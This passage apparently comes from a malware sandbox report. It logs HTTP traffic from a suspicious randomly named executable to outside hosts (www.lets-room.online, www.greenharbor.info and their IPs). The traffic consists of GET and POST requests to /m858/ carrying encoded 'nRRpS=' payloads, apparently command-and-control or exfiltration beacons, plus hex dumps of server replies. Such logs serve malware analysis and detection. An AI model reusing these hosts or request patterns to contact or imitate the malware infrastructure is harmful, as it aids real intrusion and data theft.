                                                                                                                      Data Raw: 6e 52 52 70 53 3d 6f 31 6e 42 54 38 51 35 44 75 76 62 5a 51 32 75 70 76 4f 50 58 55 63 61 53 53 70 46 5a 67 6c 61 52 38 2b 70 57 69 54 6e 67 74 65 67 39 51 36 50 53 48 6e 6d 78 37 76 5a 38 62 33 37 49 75 71 57 39 37 5a 76 49 78 61 59 4f 38 4f 52 56 65 4e 52 5a 2f 7a 71 73 53 33 71 5a 48 56 64 35 74 74 65 7a 6c 68 6f 68 65 45 67 55 69 44 34 7a 4c 63 76 57 71 53 4e 43 65 33 54 50 62 2f 33 36 48 32 39 4d 47 53 79 61 6b 41 48 69 53 6e 79 48 4a 53 63 32 6f 47 35 44 69 76 42 31 6e 75 79 64 6d 4a 6a 38 37 43 71 6f 4e 39 45 6c 63 62 2f 30 78 50 78 45 73 73 57 61 48 4c 49 46 6b 2f 39 65 32 52 33 56 41 48 65 48 30 50 4d 69 69 37 72 53 72 52 47 71 71 4e 69 61 61 33 4f 44 38 71 6c 70 73 38 50 30 7a 4a 65 36 55 68 33 52 5a 70 30 72 36 6a 4c 73 70 68 73 79 36 71 58 58 61 6b 7a 6d 62 4a 56 79 56 51 45 75 55 48 61 70 75 6e 6c 32 36 52 45 74 4b 42 35 4a 4b 49 77 4f 38 2f 70 41 31 68 51 54 65 54 79 71 4f 67 59 55 63 37 46 4c 6c 48 79 2b 35 35 71 6c 79 46 6d 43 31 34 41 79 6a 43 66 71 41 54 69 53 78 6e 65 46 62 30 2b 55 33 71 44 50 74 65 38 67 48 51 6e 79 31 72 38 39 50 30 47 73 35 2b 35 31 6f 30 6b 4e 68 57 78 4f 79 71 67 75 47 58 57 4b 53 30 38 37 46 76 47 69 45 4c 4d 38 52 79 6a 77 6f 4d 53 50 43 61 42 47 61 69 4c 6f 65 61 78 2f 75 6c 72 6b 74 62 54 69 70 41 67 77 37 4a 63 6a 6f 37 56 42 6f 42 6d 4a 41 2b 5a 63 66 6c 39 6a 4a 79 61 6f 63 41 2f 44 63 75 57 37 33 78 37 61 65 4a 52 74 30 78 73 72 49 4f 2b 69 68 48 35 49 72 78 6e 55 6d 64 45 43 6b 4e 62 44 6d 4c 4b 6e 67 2b 61 2f 45 67 74 45 46 49 50 2b 6f 69 57 36 54 32 58 75 62 65 58 48 39 56 6c 57 71 58 74 36 6b 4f 79 34 4f 48 65 5a 68 43 39 48 2f 5a 76 2f 4e 6a 4a 68 75 70 45 51 4e 57 56 4e 54 33 72 69 54 48 35 64 41 2b 58 72 62 44 6a 6d 36 59 33 6e 53 39 61 55 33 6b 71 4a 55 6b 6b 48 77 68 53 57 76 72 31 52 65 42 4f 4c 76 47 36 5a 38 6a 74 43 4a 48 39 62 73 66 69 67 74 62 41 73 58 78 64 69 76 64 74 43 48 52 4b 4f 53 34 37 71 46 45 6e 30 36 70 35 6d 46 79 6b 62 48 61 33 47 67 47 38 66 68 47 30 33 64 6b 4a 6a 72 4d 74 45 67 59 55 45 50 49 2b 5a 69 6c 32 44 49 69 68 47 6e 68 30 39 30 50 58 4f 2f 54 39 70 76 79 6c 52 41 62 72 47 54 68 41 73 68 47 35 45 52 38 64 65 50 6d 49 6c 30 70 62 49 75 79 36 54 63 53 46 5a 61 49 4a 46 55 4a 57 63 6c 47 51 53 67 79 39 47 32 63 4f 76 33 52 76 6c 45 31 6a 75 4a 42 61 6d 4c 68 61 78 64 2b 39 4a 6e 7a 74 6f 76 62 45 46 75 44 52 72 36 4a 67 72 42 69 61 72 61 4d 44 50 6c 76 31 76 71 67 7a 48 52 4e 33 79 4e 78 65 72 51 65 38 57 72 61 47 6e 58 65 74 47 2f 53 58 41 2b 6b 74 59 4b 37 74 32 6d 58 4c 66 50 49 68 38 6a 41 35 7a 45 70 77 72 67 2f 66 6f 39 42 7a 57 6c 75 55 55 4b 2f 64 67 41 46 76 51 6a 7a 36 6b 50 39 42 71 55 7a 2b 51 44 73 68 50 46 73 39 63 5a 63 42 48 75 45 39 6b 4f 6a 56 6f 7a 51 2b 78 57 63 68 78 6b 44 79 73 6c 52 4f 65 67 52 79 32 6c 6b 66 52 56 63 4b 6a 69 4d 4b 4c 71 47 5a 5a 52 49 6e 55 4f 6c 43 76 74 54 39 55 4d 33 45 75 76 77 79 6e 42 33 36 43 77 72 70 31 79 6c 59 55 37 58 6e 57 53 4e 2b 47 31 57 38 76 78 6b 4e 42 73 39 58 32 39 2f 35 74 4e 42 44 58 31 58 50 6b 70 47 51 34 48 4d 38 38 55 6c 55 65 53 49 45 52 48 71 6b 55 30 63 45 62 45 6b 56 41 41 59 51 48 59 49 68 2b 41 77 31 30 4f 6f 62 6e 32 53 71 6a 58 43 6e 59 38 62 66 49 54 6d 63 78 39 45 34 30 49 63 37 63 75 72 38 73 39 34 70 56 65 70 50 56 70 65 57 64 64 62 57 67 69 2b 2f 53 4d 4c 64 50 31 65 6e 46 36 2b 68 6c 76 4d 51 61 2f 75 75 71 47 74 65 4f 79 52 4d 44 6a 4b 75 46 65 68 62 67 6e 79 58 54 71 58 76 4c 56 63 64 6a 77 50 6c 51 43 61 54 49 52 41 6d 6e 77 67 44 35 48 77 4e 76 6d 2f 50 69 45 4d 35 73 73 38 68 76 62 71 69 48 45 53 71 39 37 66 6a 4f 6f 44 56 66 71 6d 33 46 73 6e 67 72 31 30 2b 7a 71 6c 4b 75 4b 71 56 49 34 6b 5a 65 6d 30 49 61 4a 44 58
                                                                                                                      Data Ascii: nRRpS=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngteg9Q6PSHnmx7vZ8b37IuqW97ZvIxaYO8ORVeNRZ/zqsS3qZHVd5ttezlhoheEgUiD4zLcvWqSNCe3TPb/36H29MGSyakAHiSnyHJSc2oG5DivB1nuydmJj87CqoN9Elcb/0xPxEssWaHLIFk/9e2R3VAHeH0PMii7rSrRGqqNiaa3OD8qlps8P0zJe6Uh3RZp0r6jLsphsy6qXXakzmbJVyVQEuUHapunl26REtKB5JKIwO8/pA1hQTeTyqOgYUc7FLlHy+55qlyFmC14AyjCfqATiSxneFb0+U3qDPte8gHQny1r89P0Gs5+51o0kNhWxOyqguGXWKS087FvGiELM8RyjwoMSPCaBGaiLoeax/ulrktbTipAgw7Jcjo7VBoBmJA+Zcfl9jJyaocA/DcuW73x7aeJRt0xsrIO+ihH5IrxnUmdECkNbDmLKng+a/EgtEFIP+oiW6T2XubeXH9VlWqXt6kOy4OHeZhC9H/Zv/NjJhupEQNWVNT3riTH5dA+XrbDjm6Y3nS9aU3kqJUkkHwhSWvr1ReBOLvG6Z8jtCJH9bsfigtbAsXxdivdtCHRKOS47qFEn06p5mFykbHa3GgG8fhG03dkJjrMtEgYUEPI+Zil2DIihGnh090PXO/T9pvylRAbrGThAshG5ER8dePmIl0pbIuy6TcSFZaIJFUJWclGQSgy9G2cOv3RvlE1juJBamLhaxd+9JnztovbEFuDRr6JgrBiaraMDPlv1vqgzHRN3yNxerQe8WraGnXetG/SXA+ktYK7t2mXLfPIh8jA5zEpwrg/fo9BzWluUUK/dgAFvQjz6kP9BqUz+QDshPFs9cZcBHuE9kOjVozQ+xWchxkDyslROegRy2lkfRVcKjiMKLqGZZRInUOlCvtT9UM3EuvwynB36Cwrp1ylYU7XnWSN+G1W8vxkNBs9X29/5tNBDX1XPkpGQ4HM88UlUeSIERHqkU0cEbEkVAAYQHYIh+Aw10Oobn2SqjXCnY8bfITmcx9E40Ic7cur8s94pVepPVpeWddbWgi+/SMLdP1enF6+hlvMQa/uuqGteOyRMDjKuFehbgnyXTqXvLVcdjwPlQCaTIRAmnwgD5HwNvm/PiEM5ss8hvbqiHESq97fjOoDVfqm3Fsngr10+zqlKuKqVI4kZem0IaJDX
                                                                                                                      Dec 7, 2023 13:43:22.690159082 CET533INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.84972069.57.161.215806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:25.108484030 CET446OUTGET /m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:43:25.401052952 CET548INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.849721194.58.112.174806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:31.189667940 CET718OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 44 52 56 33 4d 75 43 64 4c 54 58 61 39 30 45 6f 32 2b 79 51 72 6b 32 43 58 67 2b 41 43 41 61 5a 57 35 61 62 5a 38 41 31 50 5a 54 63 78 65 4e 2f 45 6d 38 4b 6b 32 70 4b 6c 71 42 34 30 61 65 34 57 55 51 6e 68 38 78 56 72 74 35 49 4e 66 77 71 7a 75 6d 71 66 74 35 6a 6f 70 4e 33 43 5a 2b 6b 7a 7a 36 38 6f 43 34 48 61 53 71 63 6c 2f 62 32 59 50 53 42 65 72 44 43 54 52 42 6f 6f 6d 4f 34 39 34 58 51 4b 4f 5a 46 49 6a 6e 36 61 36 42 75 36 38 52 6d 2f 78 34 42 6d 62 53 76 32 54 65 41 37 52 6a 47 39 30 41 65 77 69 6d 6e 44 75 77 56 54 67 3d 3d
                                                                                                                      Data Ascii: nRRpS=DRV3MuCdLTXa90Eo2+yQrk2CXg+ACAaZW5abZ8A1PZTcxeN/Em8Kk2pKlqB40ae4WUQnh8xVrt5INfwqzumqft5jopN3CZ+kzz68oC4HaSqcl/b2YPSBerDCTRBoomO494XQKOZFIjn6a6Bu68Rm/x4BmbSv2TeA7RjG90AewimnDuwVTg==
                                                                                                                      Dec 7, 2023 13:43:31.470525026 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:31 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                      Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                      Dec 7, 2023 13:43:31.470609903 CET1286INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                      Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                      Dec 7, 2023 13:43:31.470700979 CET1249INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                      Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.849722194.58.112.174806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:43:33.988975048 CET738OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 44 52 56 33 4d 75 43 64 4c 54 58 61 6e 56 30 6f 7a 5a 65 51 37 30 32 42 4c 51 2b 41 4d 67 61 64 57 35 57 62 5a 2f 4d 6c 4f 76 6a 63 79 38 46 2f 48 6b 45 4b 70 57 70 4b 75 4b 42 78 70 4b 65 2f 57 55 4d 42 68 39 64 56 72 73 64 49 4e 66 41 71 7a 35 79 72 4e 4e 35 39 39 35 4e 31 4e 35 2b 6b 7a 7a 36 38 6f 43 74 6f 61 52 61 63 6c 50 72 32 5a 72 6d 4f 43 37 44 64 55 52 42 6f 6a 47 4f 38 39 34 58 75 4b 50 55 69 49 68 66 36 61 2f 39 75 36 74 52 68 6c 68 34 48 69 62 54 54 7a 32 76 4d 32 42 71 6d 30 46 6b 52 32 56 66 32 50 62 63 47 55 51 54 44 4a 34 54 31 49 45 64 31 6b 78 71 43 2b 58 36 4a 43 54 49 3d
                                                                                                                      Data Ascii: nRRpS=DRV3MuCdLTXanV0ozZeQ702BLQ+AMgadW5WbZ/MlOvjcy8F/HkEKpWpKuKBxpKe/WUMBh9dVrsdINfAqz5yrNN5995N1N5+kzz68oCtoaRaclPr2ZrmOC7DdURBojGO894XuKPUiIhf6a/9u6tRhlh4HibTTz2vM2Bqm0FkR2Vf2PbcGUQTDJ4T1IEd1kxqC+X6JCTI=
                                                                                                                      Dec 7, 2023 13:43:34.270386934 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 12:43:34 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c 